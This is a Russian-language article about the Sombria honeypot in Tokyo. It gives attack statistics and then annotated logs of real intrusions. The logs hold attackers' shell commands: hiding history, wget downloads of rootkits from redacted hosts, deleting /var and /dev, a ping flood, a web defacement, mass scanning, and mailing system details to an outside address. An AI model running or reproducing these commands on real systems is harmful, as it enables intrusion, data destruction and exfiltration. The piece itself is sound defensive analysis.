Sombria (Shadowy, затененный с португальского) - honeypot,
развернутый в столице Японии, Токио. Его
основной целью, собственно как и в случае
всех ловушек, стал сбор информации о
способах проникновения хакеров, так
сказать добывания меда из улья. Авторы Sombria
наблюдали за действиями взломщиков и
записывали все их действия. В состав Sombria
входил web-сервер, файрвол и IDS, системы
обнаружения вторжений. IDS срабатывала при
проникновении, все команды записывались
для последующего анализа, файрвол отсекал
все попытки хакера использовать Sombria в
качестве базы для атаки против других
систем.

Система работала с 10 Мая по 31 Июля и сейчас
в Инет выложены все сведения, собранные
системой за время существования. Сначала -
некоторая статистика, потом -
примеры взлома по командам.

Атаки червей

Лидирует Code Red и его модификации, за ним
идет Slapper и его варианты, примерно наравне с
ним идет еще один червь - Slammer. ну и замыкает
тройку Nimdfa. Отмечу, что распределение по
времени атак червей не совсем равномерно,
например активность Nimda в середине жизни Sombria
почти сошла на нет, в общем все черви кроме
Code Red  значительно колебались в своих
попытках взломать подопытную систему.

Сбор информации

Для простоты картины приведу график, в
котором авторы объединили все виды
сканирования и разбиты по датам.

  • Port Scan - сканирование портов. Второе,
    наверное, действие нападающего после
    традиционного пинга. 
  • OpenSSL Mas Scan - попытка определить дырявость
    апача.
  • ICMP Echo Request - тот самый пинг.
  • Other - прочие попытки выяснить сущность
    подопытного, например SNMP или RPC запросы.

Проникновение

За время существования Honeypot'а
наблюдателями было отмечено 131
проникновение в систему. 

  • На первом месте идет взлом через Samba 2.2.3,
    дырка в программе позволяет выполнять
    произвольный код на системе и получать
    root'а.
  • На втором  - Apache 1.3.23 + Open SSL 0.9.6b. как и в
    предыдущем случае баг позволяет
    выполнять с системой все, что угодно.
  • Третье место принадлежит SSH - после
    взлома хакеры тупо добавляли
    пользователя в систему и уже дальше
    входили под ним.
  • Ну и меньше всего ломились в Sombria при
    помощи Backdoor'ов - мало кто оставлял за
    собой нестандартную лазейку для
    дальнейшего входя.

День и время

Оказывается, самый хороший день для
хакера - суббота. может просто у всех
выходной, а может просто умные люди
рассчитывают на то, что админ отдыхает... На
втором месте вторник, а на третьем среда.
Что же качается времени, то ломятся в
основном утром - часов в 7-8, или вечером - с 20
до 22, или ночью - 0 до 3.

Что делают

После проникновения в Sombria и получения
привилегированного доступ большинство
делает следующее:

  • Пытается загрузить руткит, эксплоит, DoS
    утилитку или программу для работы с IRC
    через ftp или http. Самые популярные тулзы:
    sslroot, config-jp, ptrace-kmod, psybnc и rk.
  • Устанавливает программу через SSH, что
    препятствует анализу трафика.
  • После установки дальше все развивается
    по стандартной схеме - попытка атаки на
    другой хост при помощи скачанных утилит.
  • Еще один логический ход - попытка
    модификации или удаления системных
    файлов.

Откуда и зачем

Как ни странно, но большинство хакеров, оказывается,
проживает в Польше, именно там живет 22% из
всех, пытавшихся взломать Sombria. Не слишком
отстает Румыния - 19%, на третьем месте Япония,
на четвертом - Малайзия. Удивительно, но России
в десятке вообще нет.

Удивительно, но мотивы большинства
нападавших админы так и не смогли
установить. Зачем они взламывали систему
для них осталось загадкой - после
проникновения они не сдали делать ничего
серьезного, почти треть на этом и
остановилась - 31%. Второй по популярности
вариант - атака других хостов, этим занялись
27%. 23% просто попытались разрушить сервер Sombria,
видимо деструктивное начало живо не только
в русских скрипткиддиз, но и в польских и
румынских... Ну и 19% попытались установить IRC
боунсер.

Как

Вот мы и подошли к самому интересному, к
разбору реальных нападений. 

Вариант А: нападение

Инцидент случился 3 Июня в 10:50. Чувак
проник в систему через дыру в Samba с машины,
расположенной в Штатах. Получив рута он
попытался скачать и установить руткиты:

|20722|0|sh|unset HISTFILE;uname -a;w;id;
|20722|0|sh|wget www.xxxxxxxxxxxxx.as.ro/george.tgz
|20722|0|sh|tar zxvf george.tgz
|20722|0|sh|cd sk-1.3b
|20722|0|sh|./inst
|20722|0|sh|cd /usr/man/man3/.inf
|20722|0|sh|./sk
|20722|0|sh|wget www. xxxxxxxxxxxxx.as.ro/nick.tar.gz
|20722|0|sh|tar zxvf nick.tar.gz
|20722|0|sh|cd nick
|20722|0|sh|./install

Всего через минуту чел вернулся к Sombria уже
с компьютера в Румынии и закачал еще софт,
включая psybnc.

|26481|0|initdl|SSH-1.5-PuTTY-Release-0.53b
|26813|0|bash|cat /etc/issue
|26813|0|bash|killall -9 smbd
|26813|0|bash|cd /usr/man/man3/.inf
|26813|0|bash|ps aux
|26813|0|bash|wghet wget www.xxxxxxxxx.com/xxxxxxxx/ psybnc.tgz
|26813|0|bash|ftp
|27425|0|ftp|open ftp.xxxxxxxxxxxxx.as.ro
|27425|0|ftp|bin
|27425|0|ftp|get CryBaby.tar.gz
|27425|0|ftp|get rh.gz
|27425|0|ftp|bye

Хакер запустил сниффер, который заменил
стандартный SSH и удалил все логи из /var, стер
все файлы в /dev. Это не позволило
наблюдателям дальше отслеживать действия
хакера и ловушка была отключена от сети.

|26813|0|bash|./sshsniff
|26813|0|bash|ps aux
|26813|0|bash|cd /var
|26813|0|bash|rm -rf var
|26813|0|bash|cd ..
|26813|0|bash|rm -rf /dev

Вариант Б: загрузка

Еще один взломщик из Польши проник
систему через ту же дырку, что и предыдущий.
Он попытался загрузить программы для
организации DoS атаки (config-jp и smurf.c), но
обломался:

|25295|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
|25295|0|sh|uptime
|25295|0|sh|wget http://www.xxxxx.xx.pl/xxxxxxx/config-jp
|25295|0|sh|ps aux
|25295|0|sh|wget http://www.xxxxx.xx.pl/xxxxxxx/config-jp
|24498|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
|24498|0|sh|wget http://xxxxx.xxx.xxx.es/xxx/progs/xxxxxx/exploits/DoS/smurf.c

Вернувшись через 4 дня он еще 5 раз пытался
загрузить config-jp, но все мимо... Отчаявшись он
решил прибегнуть к пингу и зафлудить другой
хост ICMP пакетами, но и это не удалось:

|32510|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
|32510|0|sh|ping -f xxx.xx.xxx.xx&

Позже он еще несколько раз пытался
скачать свою несчастную программу,
запинговать сторооний адрес, но ничего не
получалось... Спустя три с половиной недели
он покинул систему.

Вариант В: дефейс

8 Июня в систему проник еще один перец. Он
использовал SSH и неудачно попытался
отдефейсить сайт, скачать ptrace для повышения
привилегий:

|30416|0|sshd|SSH-2.0-OpenSSH_3.1p1
|30417|37|bash|su vadmin
|30417|37|bash|cd /var/www
|30417|37|bash|cd html
|30417|37|bash|ls
|30417|37|bash|mv index.html test.html
|30417|37|bash|echo I Was Here ... Mihai >> index.html
|30417|37|bash|cat /etc/passwd
|30417|37|bash|gcc
|30417|37|bash|cd /tmp
|30417|37|bash|wget www.xxxxx.org/ptrace-kmod.c.txt ;mv ptrace-kmod.c.txt ptrace-kmod.c
|30417|37|bash|ls
|30417|37|bash|wget www. xxxxx.org/ptrace-kmod.c.txt
|30417|37|bash|exit

Через минуту он вернулся через Samba и
теперь все получилось:

|30460|0|sh|uname -a>>/slamet; id>>/slamet; cat /slamet |mail -s "Samba Inf" xxxxxxxxxxxxx@xxxxx.com;
|30460|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE - qe3 ";uname -a;id;
|30460|0|sh|cd /var/www
|30460|0|sh|cd html
|30460|0|sh|mv index.html test.html
|30460|0|sh|echo Touched By Mihai >> index.html
|30460|0|sh|cd /etc
|30460|0|sh|rm -rf aad
|30460|0|sh|rm -rf psybnc
|30460|0|sh|cd /var/www/html/manual/mod/mod_ssl/
|30460|0|sh|echo Touched By ....Mihai >> index.html
|30460|0|sh|mv index.html ttest.html
|30460|0|sh|echo Touched By Mihai >> index.html

Вариант Г: остановка Samba

Проник снова через Samba, добавил
пользователя:

|30996|0|sh|unset HISTFILE;uname -a;w;id;
|30996|0|sh|wget www. xxxxxxx.as.ro/snik.tar
|30996|0|sh|cat /etc/issue
|30996|0|sh|cat /etc/passswd
|30996|0|sh|/usr/sbin/adduser httpd
|30996|0|sh|passwd httpd

и войдя снова по SSH попытался остановил
службу:

|2412|0|sshd|SSH-1.5-PuTTY-Release-0.53b
|5301|500|bash|cd /ls –a
|5301|500|bash|w
|5301|500|bash|ftp 217.215.***.**
|5301|500|bash|ftp 193.231.***.**
|5301|500|bash|wget www. xxxxxxxxx.com/xxxxxxxxxxxxxxx/mech.tgz
|5301|500|bash|cd /etc/init.d
|5301|500|bash|ls –a
|5301|500|bash|./smb stop

однако это не получилось в связи с недостаточностью
привилегий.

2003/06/08-07:36:21 |2412|0|sshd|SSH-1.5-PuTTY-Release-0.53b
2003/06/08-07:37:44 |5301|500|bash|cd /ls –a
2003/06/08-07:37:44 |5301|500|bash|w
2003/06/08-07:39:12 |5301|500|bash|ftp 217.215.***.**
2003/06/08-07:40:48 |5301|500|bash|ftp 193.231.***.**
2003/06/08-07:44:27 |5301|500|bash|wget www. xxxxxxxxx.com/xxxxxxxxxxxxxxx/mech.tgz
2003/06/08-07:46:48 |5301|500|bash|cd /etc/init.d
2003/06/08-07:48:59 |5301|500|bash|ls –a
2003/06/08-07:49:12 |5301|500|bash|./smb stop

еще одна попытка и Samba остановлена:

|2412|0|sshd|SSH-1.5-PuTTY-Release-0.53b
|5301|500|bash|cd /ls –a
|5301|500|bash|w
|5301|500|bash|ftp 217.215.***.**
|5301|500|bash|ftp 193.231.***.**
|5301|500|bash|wget www. xxxxxxxxx.com/xxxxxxxxxxxxxxx/mech.tgz
|5301|500|bash|cd /etc/init.d
|5301|500|bash|ls –a
|5301|500|bash|./smb stop

Вариант Д: сканирование

Хакер загрузил руткит rk и установил его:

|13113|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
|13113|0|sh|cd /var/tmp
|13113|0|sh|wget www.xxxxxxxxx.com/xxxxxxxxxx/rk.tgz
|13113|0|sh|tar -xzvf rk.tgz
|13113|0|sh|rm -rf rk.tgz
|13113|0|sh|cd rk
|13113|0|sh|./setup 6676 6676 xxxxxxxx@xxxx.com

После этого он попытался получить доступ
к Sombria с четырех машин в Румынии и стянуть
оттуда файлы: apal, samba, sslmass2,
psyBNC2.3, rh73, wu, x8, s и selena. Затем была попытка
организовать атаку против других хостов:

|17262|0|ssh2d|SSH-1.5-PuTTY-Release-0.53b
|17264|0|bash|cd /tmp
|17264|0|bash|wget xxxxxxxx.net/apal.tgz
|17264|0|bash|tar zxvf apal.tgz
|17264|0|bash|cd apal
|17264|0|bash|./scan xxx.xxx
|17264|0|bash|cd ..
|17264|0|bash|wget www.xxxxxxxxx.net/sslmass2.tgz
|17264|0|bash|tar zxvf sslmass2.tgz
|17264|0|bash|cd sslmass2
|17264|0|bash|./sslmass xxx.xxx.*.*
|17264|0|bash|cd ..
|17264|0|bash|wget www.xxxxx.xxxx.ro/selena.tgz
|17264|0|bash|wget www. xxxxxxxxxxxx.net/x8.tar.gz
|17264|0|bash|cd wu
|17264|0|bash|./startwu xx.xxx.xx.xxx
|17264|0|bash|cd ..
|17264|0|bash|cd apal
|17264|0|bash|./scan xxx.xxx

и еще раз

|17338|0|ssh2d|SSH-1.5-PuTTY-Release-0.53b
|17340|0|bash|cd /tmp
|17340|0|bash|cd sslmass2
|17340|0|bash|./httpver xxx.xxx.xxx.xxx
|17340|0|bash|./sslmass xx.xxx.*.*
|17340|0|bash|./sslmass xx.xxx.*.*
|17340|0|bash|cd ..
|17340|0|bash|cd wu
|17340|0|bash|cd ..
|17340|0|bash|cd apal
|17340|0|bash|./scan xx.xxx
|17340|0|bash|id
|17340|0|bash|./samba xx.xxx
|17340|0|bash|./scan xx.xxx.*.*

Check Also

Malware vs WordPress. Проверяем защитные плагины в боевых условиях

Wordpress — одна из самых распространенных систем управления сайтом и поэтому вызывает при…

Оставить мнение